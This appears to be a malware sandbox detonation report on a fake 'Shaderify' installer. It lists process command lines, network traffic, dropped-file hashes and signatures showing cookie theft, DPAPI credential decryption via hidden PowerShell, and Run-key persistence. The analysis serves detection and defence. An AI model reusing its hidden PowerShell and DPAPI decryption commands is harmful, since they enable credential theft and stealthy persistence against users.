C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe"
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,118,15,111,182,215,54,82,72,136,26,56,188,234,104,207,139,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,253,95,42,89,97,96,145,105,134,65,186,218,54,63,151,38,224,9,191,71,136,75,181,66,230,176,203,96,226,244,195,218,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,206,215,77,135,63,182,209,100,158,156,120,193,137,23,197,23,112,177,117,241,159,140,39,95,171,44,239,104,117,242,162,137,48,0,0,0,226,87,31,244,153,200,57,247,226,251,206,164,212,206,92,58,240,215,105,6,80,49,136,70,24,192,82,192,7,64,37,1,78,48,111,2,84,0,13,48,142,195,130,49,208,48,86,13,64,0,0,0,186,225,40,149,75,14,43,176,40,14,27,196,217,32,122,224,209,108,122,127,43,218,234,231,211,92,5,23,29,99,155,189,39,125,132,34,54,180,1,43,213,255,249,1,238,199,39,55,32,250,167,23,100,194,152,77,192,205,215,235,95,126,89,80), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,118,15,111,182,215,54,82,72,136,26,56,188,234,104,207,139,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,253,95,42,89,97,96,145,105,134,65,186,218,54,63,151,38,224,9,191,71,136,75,181,66,230,176,203,96,226,244,195,218,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,206,215,77,135,63,182,209,100,158,156,120,193,137,23,197,23,112,177,117,241,159,140,39,95,171,44,239,104,117,242,162,137,48,0,0,0,226,87,31,244,153,200,57,247,226,251,206,164,212,206,92,58,240,215,105,6,80,49,136,70,24,192,82,192,7,64,37,1,78,48,111,2,84,0,13,48,142,195,130,49,208,48,86,13,64,0,0,0,186,225,40,149,75,14,43,176,40,14,27,196,217,32,122,224,209,108,122,127,43,218,234,231,211,92,5,23,29,99,155,189,39,125,132,34,54,180,1,43,213,255,249,1,238,199,39,55,32,250,167,23,100,194,152,77,192,205,215,235,95,126,89,80), $null, 'CurrentUser')
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rcuzdlcd.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A8B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2A8A.tmp"
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1264,9975625559959901407,15312014027889785410,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1268 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1264,9975625559959901407,15312014027889785410,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1576 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1264,9975625559959901407,15312014027889785410,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1372 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | shaderify.xyz | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
Files
\Users\Admin\AppData\Local\Temp\nsi17D5.tmp\System.dll
| MD5 | 75ed96254fbf894e42058062b4b4f0d1 |
| SHA1 | 996503f1383b49021eb3427bc28d13b5bbd11977 |
| SHA256 | a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7 |
| SHA512 | 58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4 |
\Users\Admin\AppData\Local\Temp\nsi17D5.tmp\nsis7z.dll
| MD5 | c6a070b3e68b292bb0efc9b26e85e9cc |
| SHA1 | 5a922b96eda6595a68fd0a9051236162ff2e2ada |
| SHA256 | 66ac8bd1f273a73e17a3f31d6add739d3cb0330a6417faeda11a9cae00b62d8b |
| SHA512 | 8eff8fc16f5bb574bd9483e3b217b67a8986e31497368c06fdaa3a1e93a40aee94a5b31729d01905157b0ae1e556a402f43cd29a4d30a0587e1ec334458a44e8 |
\Users\Admin\AppData\Local\Temp\nsi17D5.tmp\StdUtils.dll
| MD5 | 33b4e69e7835e18b9437623367dd1787 |
| SHA1 | 53afa03edaf931abdc2d828e5a2c89ad573d926c |
| SHA256 | 72d38ef115e71fc73dc5978987c583fc8c6b50ff12e4a5d30649a4d164a8b6ae |
| SHA512 | ca890e785d1a0a7e0b4a748416fba417826ae66b46e600f407d4e795b444612a8b830f579f2cf5b6e051bea800604f34f8801cc3daf05c8d29ad05bcda454a77 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\ffmpeg.dll
| MD5 | eabfc10d56cb44a86493cb2f8ca7aab2 |
| SHA1 | 09d7e87f43527333cd021329d6c2f4e8bd8ddab5 |
| SHA256 | 42a2a996ac433ac33a22776b8418a82753557093d90147b7951138b5c83924b6 |
| SHA512 | ee31e3539fba9e5969a9f38c428f586de2dd7630cb5d8c5e3c2c934b5881f8176b8ab6ef6397c1ce4fa6ccf3ee9615225c7afa0e0b28c6fc23974e8b96625dec |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\icudtl.dat
| MD5 | ad2988770b8cb3281a28783ad833a201 |
| SHA1 | 94b7586ee187d9b58405485f4c551b55615f11b5 |
| SHA256 | df876c7af43ed93eec6aea4d2d55c805009c219653cdeb368f1d048f4922b108 |
| SHA512 | f27e542a9c6c60fa28c5b7cc2818079341ef93aef3bbcadecad2dc11aff5b1592b19c7ebfa543ea42a3cbfec26a668641b255545fb0912056e25e852c2dedd01 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\v8_context_snapshot.bin
| MD5 | c2208c06c8ff81bca3c092cc42b8df1b |
| SHA1 | f7b9faa9ba0e72d062f68642a02cc8f3fed49910 |
| SHA256 | 4a67de195878d290f49b503b83e415917b8bbcbd9936b07a5d33b48e9bc6e0a3 |
| SHA512 | 6c3c370dd086a976c44d4059a315bd3bcbb50961aa34734e65a40d861cffca9090d47cec74575afe23952e394e4845bda2d8798eebe01fb54a7a6288bce238f5 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources\app.asar
| MD5 | e95d6f8d09a92e654aadf7a4117550cf |
| SHA1 | 8d1b84e9f8fae63fe5b598bdb767d1c062bf8ffe |
| SHA256 | 781877bb7bbe002e7dacbadc65241df8ae5842b8db297f61c8786fb8e7bab09b |
| SHA512 | 517c6e2a76a52880a08c18a0ea6201fdff385ed7485b462711eacf21dc32bf446539dc297c2517e9b049e0d9c3c5e1ea99ead5804ff3d90c728cf293e5589d2f |
\Users\Admin\AppData\Local\Temp\7dd312be-8b81-4e19-80ee-bd9316898c45.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
memory/2176-181-0x000000001B800000-0x000000001BAE2000-memory.dmp
memory/2176-185-0x0000000001E80000-0x0000000001E88000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 63a28352b6c36497ca4c4cc6d3108042 |
| SHA1 | 533669455a744679cedfa7f9f8317638caa84056 |
| SHA256 | d9fcfd21dc2622e8e96585d0adc8c2ab5bd3e3d9ef0595959e9ee5ca93b5b779 |
| SHA512 | 3fa8ce3d1e47d9572d94e8b81074de6a9ebc693ca95a79919fce031fd94211d35cdd19ed1afe8bd06dd0b93f0c238cba599747f517cfcd488dac979ab346baf0 |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | 52cc110bb3777aa6bba7900630d4eb49 |
| SHA1 | 3663dc658fd13d407e49781d1a5c2aa203c252fc |
| SHA256 | 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6 |
| SHA512 | 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab |
\??\c:\Users\Admin\AppData\Local\Temp\rcuzdlcd.cmdline
| MD5 | adda0367131b4a9e75f520fec38f064c |
| SHA1 | 6e6e5408909c4f8ef216e656a37f3a25b95a05e4 |
| SHA256 | 108f6addba15bd4e5ad2ccc8afa511045d9ad0247cf578c129e7f68767438632 |
| SHA512 | 987e2414fd42b89cf14d9f2b2e042d8b62aa50df117a17a4708c07233f0c6a5edad5bb6be8db59379bcd74418b368d54523983feec1f88d125b154041e112175 |
\??\c:\Users\Admin\AppData\Local\Temp\rcuzdlcd.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC2A8A.tmp
| MD5 | bf6d2072737b4a9ce0822d18ce7e228a |
| SHA1 | 5bcf8d841bb98134d9e577c1ed31c8b3c488c530 |
| SHA256 | 0531867d0663df2546b743b028ee2177cab86f6b2bd2c28c59cfb8e470cc2ccf |
| SHA512 | 273cc3692b909f18cf15b407f1bc97873f14d0d42623fddb74a29b2cf6be6a555ee9bc5dd3698a76f2dcdb86b74aaffcf3533671d325829328f704e739f0c44d |
C:\Users\Admin\AppData\Local\Temp\RES2A8B.tmp
| MD5 | 391d1b406fe684d335063ab084195d7e |
| SHA1 | a7e0a7aa89ea415db4659e94f6bb57c2f5188014 |
| SHA256 | 4cbedf4891c138f2c21c94fcc609d1dc11598924958a9d34ae78d3fd9a46cfb1 |
| SHA512 | 54f38e201faa9e6a910efb2aeff3db0ee4a450f45e3a96aa7c8bdd146a83e69991a80613eaf5ebec36b8c6a4a6d6dad3519f025f2d73277ad2751e82c11082a3 |
C:\Users\Admin\AppData\Local\Temp\rcuzdlcd.dll
| MD5 | f96ef939189ec53e847b38567f337448 |
| SHA1 | c787daa310ee53c414d614086335887f1c2aaf0d |
| SHA256 | a9f694cf9ef935ac4d882ab3284a5c71c6729accc1eafa1fef94d0c24a45620b |
| SHA512 | 29d97b84cf1a75afb67ecbde18fe49e812820d5c4b4531ddd555f17fdd82e944da6f0b9ec4b39ff2e21de9dff8de7cc828fadc10cc5a1a5d1b158cc2f6b73693 |
C:\Users\Admin\AppData\Local\Temp\rcuzdlcd.pdb
| MD5 | 158eccf81bd14803584a8bd511a6610c |
| SHA1 | 54726e4a3a2da38682484c93990829549f59e3af |
| SHA256 | ed429ac3f5609da53de8a27f75088ff9847fff8eecf99aaeda7e22d339fbd0b3 |
| SHA512 | ca2414060ca2db1f23cc01eb0377d826043e0c1531ed496805c2fc5cda005f657be6af6d44c357a13d79f9bdcb6d3a324d0a0c135837aff720042bdb412ab6d6 |
memory/2176-209-0x0000000002A80000-0x0000000002A88000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_100_percent.pak
| MD5 | 06baf0ad34e0231bd76651203dba8326 |
| SHA1 | a5f99ecdcc06dec9d7f9ce0a8c66e46969117391 |
| SHA256 | 5ae14147992a92548bcad76867dd88cdfcdb69d951c8720920cce6fb135e3189 |
| SHA512 | aff6616e56781ebb925a0ca146245ad3b2827250b32261c0c7c0d5b10b20a343a17fc3761c95d93104163e77b2eae3f1f9cbd3cb2b377f49b42bea39bdd09b91 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources.pak
| MD5 | d13873f6fb051266deb3599b14535806 |
| SHA1 | 143782c0ce5a5773ae0aae7a22377c8a6d18a5b2 |
| SHA256 | 7b953443e3cd54a0a4775528b52fbfe5ebecbc2c71731600ed0999d227969506 |
| SHA512 | 1ab38fcb70d1958c74da2493459532b52a04b884009509a1ac8dd39f6e9e670658a52f4d19ef57f1bc71dccfdd6ceedbc18034bbcad0b500d75a97c74aac6939 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\locales\en-US.pak
| MD5 | bd8f7b719110342b7cefb16ddd05ec55 |
| SHA1 | 82a79aeaa1dd4b1464b67053ba1766a4498c13e7 |
| SHA256 | d1d3f892be16329c79f9a8ee8c5fa1c9fb46d17edfeb56a3d9407f9d7587a0de |
| SHA512 | 7cd1493e59e87c70927e66769eb200f79a57e1eb1223af4eb4064088571893d3e32cbc4b5ece568fd308992aad65684aa280dc9834f2b5d327bdee514b046e5e |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_200_percent.pak
| MD5 | 57c27201e7cd33471da7ec205fe9973c |
| SHA1 | a8e7bce09c4cbdae2797611b2be8aeb5491036f9 |
| SHA256 | dd8146b2ee289e4d54a4a0f1fd3b2f61b979c6a2baaba96a406d96c3f4fdb33b |
| SHA512 | 57258aa169bec66abf0f45a3e026bb68751fb970b74bd0cb465607fa3b2a89967e832d92d8f675f0449bb6662fcb7786d05f0597124cc8e18bb99a47245779b4 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Admincookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
memory/896-235-0x0000000000860000-0x0000000000861000-memory.dmp
memory/896-268-0x0000000077650000-0x0000000077651000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\D3DCompiler_47.dll
| MD5 | 7641e39b7da4077084d2afe7c31032e0 |
| SHA1 | 2256644f69435ff2fee76deb04d918083960d1eb |
| SHA256 | 44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47 |
| SHA512 | 8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libglesv2.dll
| MD5 | bc45db0195aa369cc3c572e4e9eefc7e |
| SHA1 | b880ca4933656be52f027028af5ef8a3b7e07e97 |
| SHA256 | a81729fd6ee2d64dfc47501a1d53794cdeee5c1daa3751f7554aea2503686d10 |
| SHA512 | dd8c39947e7d767fbdccf90c5b3eaedf3937b43c55200d2199107333b63ac09e5356c286618874fac841e1357dd927e0c70b5066c1feeedd8cc6c0fba605ee5f |
\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libEGL.dll
| MD5 | 660a9ae1282e6205fc0a51e64470eb5b |
| SHA1 | f91a9c9559f51a8f33a552f0145ed9e706909de8 |
| SHA256 | f2a841b6ef320f226965c7cb01fbc4709fc31425e490a3edfa20147ce3656c85 |
| SHA512 | 20bed2bed042033e3d8b077f9d66bce67922aaec180cc3777f20560219226b7efc73932bb87445afda4e3877472ddcd307215d23954cd082051437e5f2224263 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\swiftshader\libglesv2.dll
| MD5 | 8090f82a02c6850cc7bd2b481a7533e0 |
| SHA1 | 54a0b66d76c1b60e45e83ba4627299d0b2aae84a |
| SHA256 | e9473ba82f6d8742ab74e67484886291aa69037db72e0ae256b19581de0b772e |
| SHA512 | b2e3c57926860a7954ca6e426f5f2fa080cf6ccb5c4edd77f59744f240f597aa9613f46294e8b344db76b46fe78777b5016828b8ab2fc274ca107f3af7abd878 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\swiftshader\libegl.dll
| MD5 | acd46d81bb4f34912c255a8d01953635 |
| SHA1 | 25969cc9e588e174b854566778f283f067c3c0c6 |
| SHA256 | bd1bc00a5c29726fb39645041fc6c8295256d90c7f739ebeaa8b6c382a4db189 |
| SHA512 | 83692654ada422391b428953b2cec67048a171bbef4c59158f34607a762feac8a233b52ceaa528306cf103d9830ee38897afa996389e086d3778f290555a059b |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
92s
Max time network
154s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1608 wrote to memory of 816 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1608 wrote to memory of 816 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1608 wrote to memory of 816 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 816 -ip 816
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
145s
Max time network
151s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.253.116.51.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 2368 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2908 wrote to memory of 2368 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2908 wrote to memory of 2368 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2908 -s 80
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win10v2004-20240508-en
Max time kernel
131s
Max time network
101s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3240 wrote to memory of 1912 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3240 wrote to memory of 1912 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3240 wrote to memory of 1912 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1912 -ip 1912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 624
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
150s
Max time network
124s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\vfwXHbuGrmUZdWK.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
